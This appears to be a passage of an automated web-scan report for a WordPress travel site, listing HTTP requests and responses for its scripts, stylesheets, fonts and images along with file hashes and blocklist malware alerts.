Magic:  ASCII text, with very long lines (9063)
Size:   11943
Md5:    fe0575b66568074463f12485d90f6d4c
Sha1:   aeedd9ab3b7874e63f647042963cb1301a38b391
Sha256: 647a6b36f3fd1f21bae171270111096b4613c23a47e6621628a51bae9c82b0b7

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Wed, 22 Aug 2018 04:45:45 GMT
Accept-Ranges: bytes
Content-Length: 31000
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (30837)
Size:   31000
Md5:    269550530cc127b6aa5a35925a7de6ce
Sha1:   512c7d79033e3028a9be61b540cf1a6870c896f8
Sha256: 799aeb25cc0373fdee0e1b1db7ad6c2f6a0e058dfadaa3379689f583213190bd

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/css/odometer.css?ver=4.9.22 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 3642
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   3642
Md5:    9337e9f6de01aa71f5871fa3d3e8ccdf
Sha1:   33997ae8112e468faab7b9cb1f6117932cdf3490
Sha256: 99b872249dfbe952f0725ff0114b18b060b008a4a303fb6736ba387bb69d250d

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/css/owl.carousel.css?ver=2.2.1 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 4198
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   4198
Md5:    f693a8e5f50f88a4156c2d6ccaccc8c3
Sha1:   4231d6c3be6ccc8d0b71cabb68b0b99c0d40cd42
Sha256: 36aa42382294bd06e999e8ce16e36f39bdcb56e9b95bbbc97f76f1e2c0cdaf99
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/css/travel-agency-companion-public.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 41002
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   41002
Md5:    990563a675cccd4c556192f53a0070fd
Sha1:   699e0e203610f1bfbee8de33c25301673edf812d
Sha256: b478d1e54876374748289fa6d0582f97170e77aee4dee39e6e4a7a7ae3bd4a6a
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/themes/flight/css/main.css?ver=0.7.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 16145
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (344), with CRLF line terminators
Size:   16145
Md5:    6ff64cd33d19a4211efde1fba3cfdc9c
Sha1:   2f085e977f68cbe21746e19d837abb543df2d87e
Sha256: 7686fc9d81bfe932bfb241b49e5c25ab9ff53d038186fc862f3b52ad4b88ae91
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/js/odometer.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 21860
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (447), with CRLF line terminators
Size:   21860
Md5:    249d5d7afb25646af5fd902656e1afa9
Sha1:   a5f91602e8c407aa457ad740500db6c01047b002
Sha256: fcd52013e9154c5987cf381b8a40d3024e3be1a644d705b45a3e8144cb18f304
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/js/waypoint.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 17856
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   17856
Md5:    2741a3994b49d2331bb71d1e452df8b3
Sha1:   568906d08c8674e7b0c211e86191ce3c5189378e
Sha256: f6d6e80df1b38aad1cecd3a9e9a22114253fbeb9a05178ee66ca73934dbefa3c
                                        
                                            GET /wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:07:00 GMT
Accept-Ranges: bytes
Content-Length: 3929
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (3704)
Size:   3929
Md5:    e6784d91bf2c668bc4093063c5b15113
Sha1:   687e1d2e957a821280dbd205ae66182f16dfdc30
Sha256: 194ebae85ff853319e8668f23a4c5bf371a7d9f5d550a40980ab53026ddaaa17

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /s/poppins/v20/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.hotelsweb.site
Connection: keep-alive
Referer: http://fonts.googleapis.com/

                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 7840
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 24 Nov 2022 17:57:37 GMT
Expires: Fri, 24 Nov 2023 17:57:37 GMT
Cache-Control: public, max-age=31536000
Age: 586092
Last-Modified: Wed, 27 Apr 2022 16:51:55 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7840, version 1.0\012- data
Size:   7840
Md5:    8d91ec1ca2d8b56640a47117e313a3e9
Sha1:   a9e9bafe64666f4595051a0e895b47a5fa39e67e
Sha256: 78bc3aa78faec288bbb3bf26c9a0fa4eb67b1e69da94a17233c5cab60525efdb
                                        
                                            GET /s/poppins/v20/pxiEyp8kv8JHgFVrJJfecg.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.hotelsweb.site
Connection: keep-alive
Referer: http://fonts.googleapis.com/

                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 7884
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 28 Nov 2022 22:32:20 GMT
Expires: Tue, 28 Nov 2023 22:32:20 GMT
Cache-Control: public, max-age=31536000
Age: 224009
Last-Modified: Wed, 27 Apr 2022 17:03:52 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7884, version 1.0\012- data
Size:   7884
Md5:    9212f6f9860f9fc6c69b02fedf6db8c3
Sha1:   ac6d71b4d5fdd2b3dabc9a06ff6c001e4251da0b
Sha256: 7d93459d86585bfcdbb7e0376056226adb25821ee54b96236fe2123e9560929f
                                        
                                            GET /s/poppins/v20/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.hotelsweb.site
Connection: keep-alive
Referer: http://fonts.googleapis.com/

                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 7748
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 24 Nov 2022 16:47:02 GMT
Expires: Fri, 24 Nov 2023 16:47:02 GMT
Cache-Control: public, max-age=31536000
Age: 590327
Last-Modified: Wed, 27 Apr 2022 16:21:30 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7748, version 1.0\012- data
Size:   7748
Md5:    a09f2fccfee35b7247b08a1a266f0328
Sha1:   0da2d17e738f46d2a09e6fb7969da451719a9820
Sha256: cd36de204aca2d5fa263a731f7c20009b5e3d754ba1f1e03c33e93a48f3e7446
                                        
                                            GET /wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:06:59 GMT
Accept-Ranges: bytes
Content-Length: 12014
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (11801)
Size:   12014
Md5:    5baf42281f4fbb128816f6883fb5ff3e
Sha1:   ee59fc985c4c7d6b34ed6f8b31a1fbbbd7ad7713
Sha256: af6dd3662512bb4d13849eefd579d23ad8b28152aa6bf822fcf652412fd0cebf

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:06:59 GMT
Accept-Ranges: bytes
Content-Length: 6832
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (6608)
Size:   6832
Md5:    664c2622f0d31d62678f4830aabfe291
Sha1:   4e317239cbcadf241bf89340262542e6962ea69c
Sha256: 99ada7e01817367027759ac452a1dd11eca7557272b8940d659c07adb6bc8cbe

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.hotelsweb.site
Connection: keep-alive
Referer: http://fonts.googleapis.com/

                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 30928
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 25 Nov 2022 03:07:48 GMT
Expires: Sat, 25 Nov 2023 03:07:48 GMT
Cache-Control: public, max-age=31536000
Age: 553081
Last-Modified: Mon, 11 Jul 2022 18:57:39 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 30928, version 1.0\012- data
Size:   30928
Md5:    ac0d2859ea5f8fd6bcb3c305c08ec184
Sha1:   7f6c17e3e592cd8bd346b9cc261d8dd961b8aef7
Sha256: ae919a7c9f25f0fd97fc18e398ae8e453fcaae487e4a4cb4f896e7fecde4a780
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/lib/jquery.dataTables.min.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 82804
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (557), with CRLF line terminators
Size:   82804
Md5:    614fd3ee31851c497e4e0e302d94a630
Sha1:   8fef6ad7bd64324dce7d88546f2f6e610c06c377
Sha256: ea1c11ebd5e0683c3267fe2bcd43efe62be79bedfa8df29069df385c5ac07678

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/lib/pikaday.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 46266
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   46266
Md5:    c35aa863defbd6c923f2e7966f927c0e
Sha1:   8ec26f953657e123958989bd5fc750247e7a128d
Sha256: 056c52a519e4b95b38ceb1af4637b6d16a4589553dbb7221f047a57e18315113

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/lib/date.format.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 4011
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   4011
Md5:    ce005a19bd8c3445eff825d12c64be5d
Sha1:   4c81fd4f1d07ff8997f98dd4c5ad41b5587a4862
Sha256: 00aa9bf334f2cc56c4e3485e2b8e4f0586f213c2ecdb1024281e532c4a1a94f5

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img6.jpg HTTP/1.1 
Host: hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 35454
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x405, components 3\012- data
Size:   35454
Md5:    384f0a9bcb8f03988c104ca76e862639
Sha1:   54d46b8617636d333ff2661cdadbe84d58e6ed94
Sha256: c6040e1f9bedbe5544c341ab810da506d17a27c8c03540eec240734061e6cc25
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/lib/pikaday.jquery.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 1586
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   1586
Md5:    5ab3976821382694d7c530cbf3de9b8b
Sha1:   1952422deb2531eec1cd067fb26181cf98fead86
Sha256: 413cd30469ae52fee994be6a50f710d043018694ba315f8162b6df091f3a5a33

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/js/site/TPPlugin.js HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 21022
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   21022
Md5:    b49e9a7db67f1838a14d1777c0987551
Sha1:   ccb30d8feae4b749a2d91f6f463f0977e4f3b9f0
Sha256: 86b7c835445266a77b34c78f29a551fcf7a873afa5b883af43109db988c860b4

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:06:59 GMT
Accept-Ranges: bytes
Content-Length: 36176
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (35951)
Size:   36176
Md5:    cb1f7699be677def94bc41a5d9da4f82
Sha1:   b1aff76bd04ba59abed8e19a71db339332d9e15d
Sha256: 131c19ca61ef3ab0c3199b1db78997ec2efb8327722cef4df46f09c4892d273d

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/travel-agency/js/wow.min.js?ver=1.1.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 01:26:33 GMT
Accept-Ranges: bytes
Content-Length: 8416
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (8385), with CRLF line terminators
Size:   8416
Md5:    e1f1ff6897992a9165e8ce009b4039e3
Sha1:   e297207404fea99863aea60a1dcd3770f8ecddee
Sha256: 37461d9b50fd93b2e6d064c4aa48cbc16d5b1e82c27f47270b87a39225cc00ac

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/wp-embed.min.js?ver=4.9.22 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:07:01 GMT
Accept-Ranges: bytes
Content-Length: 1391
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (1391), with no line terminators
Size:   1391
Md5:    570ae0f3c201604926ea599d3d1f6c04
Sha1:   2c29243a73660964d4712b969d2a15e27777bc14
Sha256: 5138d39633dc69fcd0ed7f33a5e38dc339123f682fa7f5242066879c2bbc8c9b

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/travel-agency/js/custom.min.js?ver=1.1.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 01:26:33 GMT
Accept-Ranges: bytes
Content-Length: 674
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (608), with CRLF line terminators
Size:   674
Md5:    128c27147b96f3d4f8fa7d0e18e108d4
Sha1:   0b191c5996be341b6aed3e4cdfb0fbdc78c477a5
Sha256: 2d7b45dcf3a91565d6db89fa23598aaa6033518f4f7d0dcb23656569de9eb7df

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img4.jpg HTTP/1.1 
Host: hotelsweb.site
                                        
